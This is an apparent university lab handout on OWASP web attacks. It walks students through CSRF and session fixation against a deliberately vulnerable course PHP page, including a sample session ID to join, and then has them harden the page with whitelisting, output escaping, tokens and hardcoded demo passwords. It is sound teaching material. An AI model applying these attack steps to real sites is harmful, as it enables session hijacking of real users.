OWASP Review
<![CDATA[
Partner with a CSC309 student for best effect on this tutorial!
Go to
https://cs.utm.utoronto.ca/~rosenbl6/427/xsrf/secrets.php
this is the code on the midterm.
1) Demonstrate: XSRF (CSRF)
a) Attacker creates file https://cs.utm.utoronto.ca/~ATTACKER_UTORID/xsrf.html
b) Target shutdown and start firefox
c) Target visits https://cs.utm.utoronto.ca/~rosenbl6/427/xsrf/secrets.php,
adds a few secrets to their session
d) Target visits https://cs.utm.utoronto.ca/~ATTACKER_UTORID/xsrf.html
e) Target now visits https://cs.utm.utoronto.ca/~rosenbl6/427/xsrf/secrets.php to
see the attackers secrets in their session
2) Demonstrate: Session Fixation using a meta tag
a) Attacker creates file https://cs.utm.utoronto.ca/~ATTACKER_UTORID/session_fixate.html
b) Attacker visits https://cs.utm.utoronto.ca/~rosenbl6/427/xsrf/secrets.php
c) Attacker pulls their PHPSESSID from Firefox (look at the cookies in firefox under preferences/privacy )
d) Attacker creates session_fixation.html, this file uses CSRF, but this time,
causes a meta tag to be reflected back to Target. The meta tag sets the
targets PHPSESSID to the Attackers PHPSESSID
e) Target and Attacker now both share Attackers session
HINT: I already have a session started with PHPSESSID=rfup8grbgusau501lua5c6aa21
see if you can create a URL which will cause your own browser to
join that session...
https://cs.utm.utoronto.ca/~rosenbl6/427/xsrf/secrets.php?
HINT: You might want to look at http://meyerweb.com/eric/tools/dencoder/
HINT: http://www.metatags.info/meta_http_equiv_set_cookie
3) Explain how XSS can occurr given that the script is vulnerable to CSRF
4) Explain how XSS can occurr given that the script is vulnerable to Session Fixation
5) Lock down the application by
a) whitelisting input, allow [a-zA-Z0-9 ] as well as <, =, >
in the input (so what if I really did want these characters!)
b) using htmlentities on output
c) including a random token and checking
d) authenticate 'sue' with password 'supersecure' and 'arnold' with password 'spiderman'
as users of the application. Start a new session once the user is authenticated.
For this exercise, it is OK to hardcode the two users and their passwords in the
script. Note: It does not prevent an attacker from fixating using their own account,
similarly to what was done to exploit the original secrets.php, but in case the account
is determined and used as part of the application, fixation amounts to tracable updates
to the attackers account instead of the targets account.
Starter code can be found at
https://cs.utm.utoronto.ca/~rosenbl6/427/xsrf.zip (5c has been done for you already)
Hand in via submit (by Wednesday)...owasp.zip consisting of
0) members.txt the members of your group
1) xsrf.html
2) session_fixate.html
3) q3.txt your explanation
4) q4.txt your explanation
5) secrets.php patched code
]]>